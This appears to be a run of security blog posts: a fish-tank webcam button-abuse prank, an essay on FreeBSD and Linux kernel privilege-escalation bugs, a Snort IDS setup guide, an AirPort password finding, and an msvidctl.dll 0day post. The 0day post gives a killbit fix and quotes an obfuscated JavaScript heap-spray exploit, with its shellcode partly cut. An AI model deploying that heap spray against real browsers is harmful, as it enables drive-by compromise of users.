nodereality

I have been very bored and then yesterday Remy showed me this. And doing so was a very bad idea, let me explain why.

Tankedcam is an interactive fish tank. Backed by a servo board and a front-end webpage, you're able to press buttons to control what happens inside the tank. The live demo on the website contains a few interesting things.

• Dino - Open/close the jaw of the dino. (I see it as a fish chomper)
• Air Stone - A jet of bubbles. (Bubble blaster right?)
• Flashlight - Makes things bright. (Blinds em -.-)

However, I cant press the buttons fast enough to chomp anything and the flashlight turns off after 10 seconds. But I can abuse the programming. The webpage sends GET requests when you press one of the buttons on the controller although a session ID and timestamp is needed. There is a very simple way to overcome this, i'll just use javascript mouse events to simulate the onclick event of the buttons.

Few minutes later I have a very simple script that rapidly 'clicks' the open and close buttons for the dino jaw. I add support for the other tank functions and Fish Hack Script was finished.

One thing I have noticed if I lower the timer the whole servo starts to play up, maybe it cant draw enough power. :(

Anyway, have fun the script is here (UPDATE: Right click save, nodereality referer has been blocked). If you catch a fish in the chomper I want a picture, there is also some snails that come out at night they move slower. I had fun throwing one of the top off the chopper.

There is a direct correlation between the popularity of an operating system and its vulnerabilities, especially the available exploits for those vulnerabilities. We can see this trend with the available exploits in Linux based distributions. Other factors are definitely involved like quality assurance. Since FreeBSD and Linux are open source and free software, the people who contribute code and time are for the most part, doing so because they are passionate about what they do. This is one of the possible reasons why these type of exploits are not so frequent, in fact there is only one kernel exploit for FreeBSD. The other factor that seems to be a main contributer to quality of code, is the way the organization works or communicates.

The Linux development environment is a loosely organized group of enthusiasts around the world who communicate solely by email lists and message boards. While this has been the reason for so much success and innovation, it has also caused problems, problems that the FreeBSD development community does not face because of their strict guidelines and assigned hierarchical structure. While this typically impedes innovation, it is one of the key reasons why FreeBSD is one of the most stable operating systems that runs the backbones of the Internet (http://en.wikipedia.org/wiki/FreeBSD) as well as topping the lists with the highest uptimes (http://news.netcraft.com).

The code running the operating system should be one of the most important decisions one can make when building a server or network with the intent of mitigating attacks. Choosing one with a minimal, hardened system (no bloat), scrutinized open source code (ability to see in detail what everything is doing) and years of reliability (ISP's and Government agencies can testify to this) is paramount for security. With that in mind, let us take a look at the differences between local privilege escalation kernel exploits available for both operating systems, and then examine how they can be used to put a system into an incorrect state.

A local privilege escalation kernel exploit may seem like a long word. Let's break it down. Local means that the attack can only be instigated from inside the machine. This means that the attacker can either be 1) physically sitting in front of the machine or 2) logged in remotely, typically on a shell like SSH, telnet or a PHP shell. Privilege escalation means just that, exploiting a process by executing a binary with malicious intent to gain more privileges. This typically involves memory access violations (in other words, exploits) to change from one users privileges to another users privileges to gain more access to files on the targeted system. A kernel is the core of the operating system. By itself it does nothing. In an operating system it is like the traffic controller, police man and plumber to the userland processes. When a kernel is exploited, the attacker will get root access if it is successful.

Putting it all together, what would happen is a remote attacker logs into the machine, downloads his or her exploits and tools and runs them, exploiting the kernel and giving him or her root privileges on the system.

FreeBSD 7.0/7.1 (ktimer) Local Kernel Root Exploit (http://www.securityfocus.com/bid/34196) and Linux Kernel SCSI IOCTL Integer Overflow Vulnerability (http://www.securityfocus.com/bid/12198/info) are two examples from different operating systems that display a similar type of vulnerability classification. SCSI IOCTL is used by the Linux kernel to control SCSI hardware devices such as hard disks. When it is given an out of range integer it may crash. When the input is supplied in a certain way, the crash can be controlled by an attacker to gain root privileges on the machine. The ktimer function in the FreeBSD kernel is used to control how many timers each process may have. When one of those timers reaches 0, certain actions are to be taken by the kernel. When a user passes an integer to ktimer, the timer is supposed to act on a specific timer labeled by the supplied integer. The problem with this is that the ktimer function was not bounds checked on the supplied integer causing a similar problem as the Linux kernels IOCTL vulnerability. The classification of these two exploits is called an Access Validation Error and a Boundary Condition Error, respectively.

Some of the built in protections on Unix based systems are the use of canaries (security cookies) and randomized stack address space. These, however, are not used in kernels generally speaking, so kernels are not protected against these types of attacks.

Thus it is very important to have the code scrutinized to the very last detail by as many trained eyes as possible. Black box testing methods like fuzzing could possibly aide in discovery of kernel vulnerabilities. These methods can work to help find other vulnerabilities in the kernel, but the best way to correct situations like these is through thorough communication and collaboration within the programming and security communities.

This is a tutorial based on my experience with installing Snort IDS with the BASE system to view, dissect and graph alerts. This is a very straightforward install thanks to FreeBSD's ports system. If you choose another operating system like Linux, note that you probably will have to install from source because the package management systems like aptitude are severely out of date.

Let's begin!

# Locate Snort in the FreeBSD ports tree and cd into that directory:
cd /usr/ports/security/snort
# Change to the root user and install
sudo make install clean

It will ask you a few questions in a ncurses interface, choose the database you will be using. I choose MySQL because it is already installed, but I recommend PostgreSQL for its speed and ease of use.

When it finishes compiling we need to install oinkmaster. Oinkmaster is a port that will get the latest signatures from snort.org. Configuration instructions for this are followed after we install.

#Locate oinkmaster and cd into its directory
cd /usr/ports/security/oinkmaster
# Change to root user and install
sudo make install clean

Now you need to goto snort.org and register in order to receive the latest snort definitions. You will receive a hash which you'll place in your configuration file. Save this hash. It's time to setup the configuration file for oinkmaster and then run it to receive over 500MB of definitions.

# change the name of oinkmaster.conf.sample to oinkmaster.conf
mv /usr/local/etc/oinkmaster.conf.sample /usr/local/etc/oinkmaster.conf
# open this up with your favorite editor
ee /usr/local/etc/oinkmaster.conf

Inside this configuration you need to look for this line: Example for Snort-Current.

Change the to the hash you saved earlier (replacing the < , > symbols as well).

Now the next part which I ran into trouble with was that when we run oinkmaster like:

oinkmaster -o /usr/local/etc/snort/rules

I realized that there was not enough space in my /tmp directory.

[root@mysystem ~]$ df
Filesystem  1K-blocks    Used     Avail Capacity  Mounted on
/dev/ad2s1a    507630  220226    246794    47%    /
devfs               1       1         0   100%    /dev
/dev/ad2s1e    507630     164    466856     0%    /tmp
/dev/ad2s1f 146367154 9481038 125176744     7%    /usr
/dev/ad2s1d   1998574 1489084    349606    81%    /var

So I changed the directory where oinkmaster saves the tar.gz to another directory that was in a larger partition.

# change the directory if your /tmp partition is under 500MB
tmpdir = /home/someuser/snort/

Now that oinkmaster has enough room to download and extract the tarball we can run our command again:

oinkmaster -o /usr/local/etc/snort/rules

Our rules are up to date, now we need to setup a database so that Snort can save alerts and BASE can display them on the web.

# login as root to MySQL, create a database and user for snort
mysql -u root -p
CREATE DATABASE `snort`;
GRANT ALL PRIVILEGES ON snort.* to 'snort'@'localhost' IDENTIFIED by 'somepasswordhere';

Now we setup our database with tables and the appropriate data with a script that was included in the port.

#login to MySQL as the snort user and direct all the data from create_mysql into the database
mysql -u snort -p snort < usr/local/share/examples/snort/create_mysql</code>

There are a few more things to do to make snort work. We first have to edit the snort.conf so that it knows about our database. We also have to add snort to our startup options (rc.conf).

#open up snort.conf and optimize and configure some settings (make sure your db settings are correct)
ee /usr/local/etc/snort/snort.conf</code>
#uncomment the following lines (and configure):
# config detection: search-method lowmem
# output alert_syslog: LOG_AUTH LOG_ALERT
# output database: log, mysql, user=snort password=mysnortpassword dbname=snort host=localhost

Also make sure to uncomment all the include $RULE_PATH lines, or if you want, only uncomment the ones you wish to monitor, which will increase speed but decrease definitions to check for.

Enable snort in rc.conf:

sudo ee /etc/rc.conf    # and adding snort_enable=”YES”</code>

Let's install BASE now:

cd /usr/ports/databases/adobd; sudo make install clean
cd /usr/ports/security/base; sudo make install clean

Setup apache to point to the directory base is installed in and restart apache.

#start snort
sudo /usr/local/etc/rc.d/snort start

Login to your BASE site and follow the instructions and now your IDS system is installed.

Using Snort with BASE:

This is the BASE main screen on my server. It give the user an easy to use interface to view different alerts.

I find it best to view the unique alerts on this main screen and check the details of those packet captures.

Here is a display of the unique alerts. It shows the total amount of times that specific alert was triggered. You can open up a specific incident and view the pcap file in many different formats.

Here is a payload of the MSSQL Slammer worm. It is the most active alert on my server, however it poses no threat to me because I do not run Windows.

There is even graphing functions:

It is useful to know about what is going on in your network and Snort is an excellent tool to assist with this. However, Snort IDS will not stop attacks, it only displays what has happened. There are other tools to actually stop attacks, like Snort-Inline (modes such as PRM or packet replace mode, change the data so it becomes useless).

You need to supplement your server with PF (packet filtering) in order to maintain a good degree of security. If you notice, there has been no alerts of port scanning. My PF configuration stops this kind of activity completely.

Other tools to increase your awareness of an incident on FreeBSD would be to install TripWire which shows what files were modified, created or deleted on your system. Also some configuration changes like putting your OpenSSH server on a higher port so bots do not brute force it. With some scripts and IPTables you can blacklist certain IP's from repeated brute force attempts against your server. You should also always use a remote logging system because it is very easy for the attacker to clean the logs once the attacker has root access to your server.

This is something little I found by chance, its not the most major of security holes but hey I get a plaintext password. You should never be able to get a password in plaintext... just defeats the point, right?

Let me explain a little in to how this happened. I already have a Time Capsule device from Apple, this is a network storage device but also provides routing, network address translation and wifi. However, it lacks the AirTunes option that the AirPort Express device offers.

AirTunes allows you to stream music over wireless to the speaker connected to the AirPort Express device. But because this device also has the other feature of the Time Capsule without the network storage I couldn't justify to myself buying a new AirPort Express and I got a used one from eBay.

All is well, and I get my package in the post a few days after buying. I plug it in and open the AirPort Utility to configure the device to my needs.

Problem! The device is asking for a password... Well ok I must be able to factory reset this unit and a quick google brings me to this support article. It tells me I should do a soft reset if I forget the password. This gives you 5 minutes to change any setting on the device without a password including the password itself.

I do a soft reset and open the configuration on the device... something I notice is the password field has some masked letters in, but something that appeals to me more is the option to save the password in my keychain. So, I check this option and change a different setting on the AirPort Express (e.g. device name) so the save button will be enabled.

After saving I check my keychain, and what a shock the password that the old owner of this AirPort Express is there to me in plain text.

As you probably know, it's a Windows 0day against msvidctl.dll. Some chinese sites have been using drive-by attacks with it for the past 3 days or so.

Microsoft has an advisory, as well as a blog post.

The idea is that setting the killbit on the dll will prevent the attack (.reg file):

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}] 
"Compatibility Flags"=dword:00000400

You can find variations of the snippet according to CSIS (who supposedly discovered the exploit) all over the web:

var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+"%u03eb%ueb59%ue805
%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" +
 + [SNIP]);
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace)
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)
shuishiMVP=sh uishiMVP+sh uishiMVP+bZmybr; memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

For those of you who want to do further testing, there is a metasploit module available, as well as a quick script to generate the gif file directly.

For reference, here are CVE and OSVDB links.